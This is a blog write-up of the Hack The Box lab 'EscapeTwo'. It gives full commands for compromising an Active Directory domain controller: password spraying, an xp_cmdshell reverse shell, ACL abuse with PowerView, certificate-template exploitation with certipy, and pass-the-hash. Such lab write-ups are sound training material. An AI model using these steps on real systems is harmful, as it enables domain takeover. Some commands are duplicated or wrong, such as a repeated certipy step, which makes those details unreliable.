A while ago, I did a writeup on Cicada. In this post, I’ll share my thought process and what I’ve learned solving EscapeTwo.

EscapeTwo is the second box in the Attacking Active Directory Track on Hack The Box. So, it’s only natural that I stick with that theme.

Enumeration

Scanning

Every enumeration starts with nmap. I let a full ports version + default script scan run in the background:

sudo nmap -Pn -n -p- -sVC escapetwo.htb -oA tcp_all_ports

sudo nmap -Pn -n -p- -sVC escapetwo.htb -oA tcp_all_ports

Then run a fast scan (top 100 ports) to get results more immediately so I don’t have to wait:

sudo nmap -Pn -n -F -sVC escapetwo.htb -oA quick_version

sudo nmap -Pn -n -F -sVC escapetwo.htb -oA quick_version

From the scans, it’s pretty apparent that this is a domain controller:

53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-01 01:07:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL

53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-01 01:07:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL

Kerberos and LDAP are common services to be found no a domain controller (DC). It’s also not uncommon for DCs to act as a DNS server either.

And it includes DC01 in it’s domain name. That confirms things!

I updated my /etc/hosts to reflect our DNS finds. So in the following commands, you’ll see escapetwo.htb -> sequel.htb

It’s also worth noting that a MS SQL Server is hosted on this box:

1443/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM

1443/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM

SMB

SMB is open on it’s default 139 port. That’s a good place to start because it means we can enumerate shares and users.

For this, I used nxc with the credentials provided in the lab overview:

nxc smb sequel.htb -u rose -p KxEPkKe6R8su --shares --users | tee nxc_smb_shares_users.out

nxc smb sequel.htb -u rose -p KxEPkKe6R8su --shares --users | tee nxc_smb_shares_users.out

I like this tool because it quickly lists what level of access I have across the different shares. And it looks like I have read on Accounting Department with rose.

I’ll use smbclient to login and take a look:

smbclient -U rose -P KxEPkKe6R8su //escapetwo.htb/Accounting\ Department/

smbclient -U rose -P KxEPkKe6R8su //escapetwo.htb/Accounting\ Department/

I grabbed a suspiciously named accounts.xlsx file and tried to open it up with Libre Calc but it’s corrupted…

Here’s what I did that, Hindsight 20/20, wasn’t very smart. I repaired the file with unzip‘s -FF argument and dug through the extracted XML files.

I eventually came across a sharedStrings.xml file that had credentials. Including what looks like a service account user, sa. Judging by the password, it’s very likely that it’s the service account for MSSQL.

I later found out that I could have repaired the magic bytes of the Excel accounts file. Then, I could have opened it in Libre Calc like a sane person…

Initial Access

We have creds to try out. And the road obviously leads to SQL (although it’s good to try all of the creds on all of the services).

I used Impacket’s mssqlcllient script to login:

impacket-mssqclient <span 
                data-original-string='gEa8LTffHEgdQddf8T3MaA==332yOQgyv2WYkePwaSpdONl/Q=='
                class='apbct-email-encoder'
                title='This contact has been encoded by Anti-Spam by CleanTalk. Click to decode. To finish the decoding make sure that JavaScript is enabled in your browser.'><span class="apbct-blur">**</span>@<span class="apbct-blur">****</span>el.htb</span>

impacket-mssqclient **@****el.htb

There wasn’t much to go off of here in terms of DBs, but I am able to run commands with xp_cmdshell. It’s also worth noting that with xp_dirtree I can see a directory called SQL2019 in the current working directory.

I can run commands by first running enable_xp_cmdshell and then running xp_cmdshell <cmd>. But, I’d prefer something more interactive.

So, I’ll setup a listener on my attacker host with nc:

nc -nlvp 4444

nc -nlvp 4444

Then, I’ll run a command to send a reverse connection back. I used this awesome resource to generate a base64-encode PowerShell payload:

xp_cmdshell "powershell -e <base64-encoded payload>"

xp_cmdshell "powershell -e <base64-encoded payload>"

And I got a connection back!

Pivot

Now that I have the freedom to move through the file system, I can find more information. I checked the User directory to see if I had access to a user flag.

I didn’t but I did make note of a user’s home directory called ryan. This aligns with output from the earlier SMB enum with nxc:

SMB                      10.129.13.88    445    DC01             ryan

SMB                      10.129.13.88    445    DC01             ryan

This is likely the user account I need to target.

I revisited the SQL2019 directory from earlier. It has config files for the MS SQL service. Inside, the file sql-Configuration.INI has the credentials I used earlier plus a new password for what looks like a service account.

This would be worth spraying with to see if anyone is using this password. I gathered the usernames listed in the accounts.xslx file and used nxc to spray SMB:

nxc smb sequel.htb -u users.txt -p <svc passwd>

nxc smb sequel.htb -u users.txt -p <svc passwd>

Surprise, surprise…the password worked with ryan.

From my earlier all ports scan, I know that WinRM is accessible:

5985/tcp  open  wsman

5985/tcp  open  wsman

So I can use evil-winrm to get a shell with ryan:

evil-winrm -i sequel.htb -u ryan

evil-winrm -i sequel.htb -u ryan

And I have a nice stable shell. I’m now free to grab the user flag.

PrivEsc

It’s time to find a path to Domain Admin. To do this, I can use BloodHound to map out a path.

But first, I need data. I can upload the SharpHound injestor to get this data for me:

*Evil-WinRM* PS C:\Users\ryan> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\ryan> ./SharpHound.exe -c All
*Evil-WinRM* PS C:\Users\ryan> download 20260403063505_BloodHound.zip

*Evil-WinRM* PS C:\Users\ryan> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\ryan> ./SharpHound.exe -c All
*Evil-WinRM* PS C:\Users\ryan> download 20260403063505_BloodHound.zip

I love how easy evil-winrm makes file transfers.

I uploaded the zip into BloodHound for examination. There was no apparent path from ryan to domain admin.

But, examining the ryan user node reveals that the account has Write Owner permissions over a ca_svc user. This means that ryan can take ownership of this user object.

The ca_svc user is a member of the Cert Publishers, which means they have privileges necessary to publish certificates.

With this information, I can potentially:

1. Change the password of the ca_svc user
2. Use the ca_svc account to forge a certificate template to authenticate as any user

To exploit Write Owner permissions and takeover the ca_svc account, I can upload PowerView.ps1 and run the following commands:

Import-Module ./PowerView.ps1
Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"
$securePassword = ConvertTo-SecureString "Test1234$" -AsPlainText -Force
Set-DomainUserPassword -Identity ca_svc -AccountPassword $securePassword

Import-Module ./PowerView.ps1
Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"
$securePassword = ConvertTo-SecureString "Test1234$" -AsPlainText -Force
Set-DomainUserPassword -Identity ca_svc -AccountPassword $securePassword

It’s best to have these commands in a script file and then run that file. I did end up having to reset the password for ca_svc a few times because it would sometimes reset itself.

I can use the trusty nxc command to verify this worked:

nxc smb escapetwo.htb -u ca_svc -p 'Test1234$'

SMB         10.129.232.128  445    DC01             [+] sequel.htb\ca_svc:Test1234$

nxc smb escapetwo.htb -u ca_svc -p 'Test1234$'

SMB         10.129.232.128  445    DC01             [+] sequel.htb\ca_svc:Test1234$

Noice.

Now I can enumerate the existing certificate templates with certipy:

certipy find -u '<span 
                data-original-string='QenljyhPu04TwIUUyqcD/g==332pUY2/XP3maqSSirkn9w6Rcc9s3B3TMm6DhvMW/N3rNE='
                class='apbct-email-encoder'
                title='This contact has been encoded by Anti-Spam by CleanTalk. Click to decode. To finish the decoding make sure that JavaScript is enabled in your browser.'>ca<span class="apbct-blur">****</span>@<span class="apbct-blur">****</span>el.htb</span>' -p 'Test1234$' -dc-ip 10.129.15.16 -vulnerable -enabled -stdout

certipy find -u 'ca****@****el.htb' -p 'Test1234$' -dc-ip 10.129.15.16 -vulnerable -enabled -stdout

There’s a template called DunderMifflinAuthentication (love the Office theme here) that is vulnerable to ESC4. This means that with the current privileges of the ca_svc account, I can modify the template. And since this seems to be a certificate template for authentication, I can use this as a vector to login as Administrator.

I can again use certipy to modify the template:

certipy template -u '<span 
                data-original-string='xwIg3nr+KgyZVDNe4I1hdA==332DjaZdsE3r7Gz0IKfgLFYoW1O4SPSnzs2hzmkfcaL+j8='
                class='apbct-email-encoder'
                title='This contact has been encoded by Anti-Spam by CleanTalk. Click to decode. To finish the decoding make sure that JavaScript is enabled in your browser.'>ca<span class="apbct-blur">****</span>@<span class="apbct-blur">****</span>el.htb</span>' -p 'Test1234$' -template DunderMifflinAuthentication -target dc01.sequel.htb -target-ip 10.129.15.16 -write-default-configuration

certipy template -u 'ca****@****el.htb' -p 'Test1234$' -template DunderMifflinAuthentication -target dc01.sequel.htb -target-ip 10.129.15.16 -write-default-configuration

The above command modifies the DunderMifflinAuthentication template to make it vulnerable to ESC1. With the modified template, I now have control over the Subject Alternate Name of the requested certificate. Which is what I need to request a certificate for authenticating as the Administrator account:

certipy template -u '<span 
                data-original-string='Tf258NRgxUkjZUvw6Fzy2g==332btjOGYfpzvs5VjPdcgTtETL2uiAm5WnIRXvXuGUb3YA='
                class='apbct-email-encoder'
                title='This contact has been encoded by Anti-Spam by CleanTalk. Click to decode. To finish the decoding make sure that JavaScript is enabled in your browser.'>ca<span class="apbct-blur">****</span>@<span class="apbct-blur">****</span>el.htb</span>' -p 'Test1234$' -template DunderMifflinAuthentication -target dc01.sequel.htb -target-ip 10.129.15.16 -write-default-configuration

certipy template -u 'ca****@****el.htb' -p 'Test1234$' -template DunderMifflinAuthentication -target dc01.sequel.htb -target-ip 10.129.15.16 -write-default-configuration

Note: I did have to specify the target and target-ip arguments here to avoid DNS errors I was getting with the tool because it kept trying to resolve dc01.sequel.htb even though I had it specified in /etc/hosts.

Now, that I have a valid certificate for the Administrator account, I can retrieve the account’s hash:

certipy auth -pfx administrator.pfx -dc-ip 10.129.15.16

certipy auth -pfx administrator.pfx -dc-ip 10.129.15.16

I can again revisit evil-winrm for a Pass-the-Hash attack to login as the Administrator:

evil-winrm -i sequel.htb -u <span 
                data-original-string='5SPN1+bhfADrq4Ap6OTU5g==332E0Hig2AHEHIMTnKuGmiuhBBsuQ7HjEHL7SdVeTkRMJY='
                class='apbct-email-encoder'
                title='This contact has been encoded by Anti-Spam by CleanTalk. Click to decode. To finish the decoding make sure that JavaScript is enabled in your browser.'>ad<span class="apbct-blur">***********</span>@<span class="apbct-blur">****</span>el.htb</span> --hash <hash>

evil-winrm -i sequel.htb -u ad***********@****el.htb --hash <hash>

And then all that’s left is to grab the flag!

Conclusion

This lab was an excellent example of Active Directory exploitation.

Having to use BloodHound for enumeration and Certificate Template exploitation to get admin access made it feel very realistic!

As I continue refreshing my skills through the Active Directory Enumeration & Attacks module on HTB, I’ll hack more boxes on the Attacking Active Directory Track to practice. So look out for more posts from me!

I highly recommend this module + practice track if you haven’t explored it already. I’m learning so much 🙂

Happy hacking!